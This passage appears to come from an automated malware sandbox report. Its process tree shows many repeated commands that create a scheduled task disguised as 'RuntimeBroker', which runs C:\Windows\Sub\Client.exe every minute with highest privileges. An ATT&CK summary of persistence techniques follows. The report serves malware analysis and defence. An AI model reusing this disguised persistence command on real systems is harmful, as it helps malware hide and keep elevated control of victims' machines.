                [depth 9] C:\Windows\system32\schtasks.exe (PID 1068)
                  command line: SchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST
                  - Creates scheduled task(s)
              [depth 8] C:\Windows\SYSTEM32\CMD.exe (PID 2616)
                command line: "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST & exit
                [depth 9] C:\Windows\system32\schtasks.exe (PID 1112)
                  command line: SchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST
                  - Creates scheduled task(s)
              [depth 8] C:\Windows\SYSTEM32\CMD.exe (PID 4904)
                command line: "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST & exit
                [depth 9] C:\Windows\system32\schtasks.exe (PID 4656)
                  command line: SchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST
                  - Creates scheduled task(s)
              [depth 8] C:\Windows\SYSTEM32\CMD.exe (PID 2152)
                command line: "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST & exit
                [depth 9] C:\Windows\system32\schtasks.exe (PID 4400)
                  command line: SchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST
                  - Creates scheduled task(s)
              [depth 8] C:\Windows\SYSTEM32\CMD.exe (PID 1120)
                command line: "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST & exit
                [depth 9] C:\Windows\system32\schtasks.exe (PID 2232)
                  command line: SchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST
                  - Creates scheduled task(s)
              [depth 8] C:\Windows\SYSTEM32\CMD.exe (PID 5056)
                command line: "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST & exit
                [depth 9] C:\Windows\system32\schtasks.exe (PID 3184)
                  command line: SchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST
                  - Creates scheduled task(s)
              [depth 8] C:\Windows\SYSTEM32\CMD.exe (PID 4816)
                command line: "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST & exit
                [depth 9] C:\Windows\system32\schtasks.exe (PID 4084)
                  command line: SchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST
                  - Creates scheduled task(s)
              [depth 8] C:\Windows\SYSTEM32\CMD.exe (PID 4080)
                command line: "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST & exit
                [depth 9] C:\Windows\system32\schtasks.exe (PID 4412)
                  command line: SchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST
                  - Creates scheduled task(s)
              [depth 8] C:\Windows\SYSTEM32\CMD.exe (PID 2324)
                command line: "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST & exit
                [depth 9] C:\Windows\system32\schtasks.exe (PID 4416)
                  command line: SchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST
                  - Creates scheduled task(s)
              [depth 8] C:\Windows\SYSTEM32\CMD.exe (PID 4932)
                command line: "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST & exit
                [depth 9] C:\Windows\system32\schtasks.exe (PID 1584)
                  command line: SchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST
                  - Creates scheduled task(s)
              [depth 8] C:\Windows\SYSTEM32\CMD.exe (PID 3316)
                command line: "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST & exit
                [depth 9] C:\Windows\system32\schtasks.exe (PID 3356)
                  command line: SchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST
                  - Creates scheduled task(s)
              [depth 8] C:\Windows\SYSTEM32\CMD.exe (PID 5108)
                command line: "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST & exit
                [depth 9] C:\Windows\system32\schtasks.exe (PID 3964)
                  command line: SchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST
                  - Creates scheduled task(s)
              [depth 8] C:\Windows\SYSTEM32\CMD.exe (PID 4860)
                command line: "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST & exit
                [depth 9] C:\Windows\system32\schtasks.exe (PID 2704)
                  command line: SchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST
                  - Creates scheduled task(s)
              [depth 8] C:\Windows\SYSTEM32\CMD.exe (PID 1140)
                command line: "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST & exit
                [depth 9] C:\Windows\system32\schtasks.exe (PID 212)
                  command line: SchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST
                  - Creates scheduled task(s)
              [depth 8] C:\Windows\SYSTEM32\CMD.exe (PID 2216)
                command line: "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST & exit
                [depth 9] C:\Windows\system32\schtasks.exe (PID 612)
                  command line: SchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST
                  - Creates scheduled task(s)
              [depth 8] C:\Windows\SYSTEM32\CMD.exe (PID 2976)
                command line: "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST & exit
                [depth 9] C:\Windows\system32\schtasks.exe (PID 2412)
                  command line: SchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST
                  - Creates scheduled task(s)
              [depth 8] C:\Windows\SYSTEM32\CMD.exe (PID 2708)
                command line: "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST & exit
                [depth 9] C:\Windows\system32\schtasks.exe (PID 4680)
                  command line: SchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST
                  - Creates scheduled task(s)
              [depth 8] C:\Windows\SYSTEM32\CMD.exe (PID 4176)
                command line: "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST & exit
                [depth 9] C:\Windows\system32\schtasks.exe (PID 3932)
                  command line: SchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST
                  - Creates scheduled task(s)
              [depth 8] C:\Windows\SYSTEM32\CMD.exe (PID 4816)
                command line: "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST & exit
                [depth 9] C:\Windows\system32\schtasks.exe (PID 1508)
                  command line: SchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST
                  - Creates scheduled task(s)
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST & exit8⤵PID:1992
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST9⤵
- Creates scheduled task(s)
PID:4412
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST & exit8⤵PID:4940
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST9⤵
- Creates scheduled task(s)
PID:752
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST & exit8⤵PID:2092
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST9⤵
- Creates scheduled task(s)
PID:4344
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST & exit8⤵PID:3908
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST9⤵
- Creates scheduled task(s)
PID:3204
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST & exit8⤵PID:5020
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST9⤵
- Creates scheduled task(s)
PID:116
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST & exit8⤵PID:2904
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST9⤵
- Creates scheduled task(s)
PID:1400
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST & exit8⤵PID:712
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST9⤵
- Creates scheduled task(s)
PID:4416
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST & exit8⤵PID:904
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST9⤵
- Creates scheduled task(s)
PID:1836
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST & exit8⤵PID:3236
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST9⤵
- Creates scheduled task(s)
PID:1704
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST & exit8⤵PID:3968
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST9⤵
- Creates scheduled task(s)
PID:3356
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST & exit8⤵PID:1488
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST9⤵
- Creates scheduled task(s)
PID:4084
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST & exit8⤵PID:3964
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST9⤵
- Creates scheduled task(s)
PID:3528
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST & exit8⤵PID:5072
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST9⤵
- Creates scheduled task(s)
PID:2076
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST & exit8⤵PID:1420
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST9⤵
- Creates scheduled task(s)
PID:2536
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST & exit8⤵PID:904
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST9⤵
- Creates scheduled task(s)
PID:4968
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST & exit8⤵PID:1500
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST9⤵
- Creates scheduled task(s)
PID:3316
-
-
-
-
-
-
-
-
Network

MITRE ATT&CK Enterprise v15

Persistence
  Boot or Logon Autostart Execution (3)
    Registry Run Keys / Startup Folder (2)
    Winlogon Helper DLL (1)
  Scheduled Task/Job (1)

Privilege Escalation
  Boot or Logon Autostart Execution (3)
    Registry Run Keys / Startup Folder (2)
    Winlogon Helper DLL (1)
  Scheduled Task/Job (1)
Downloads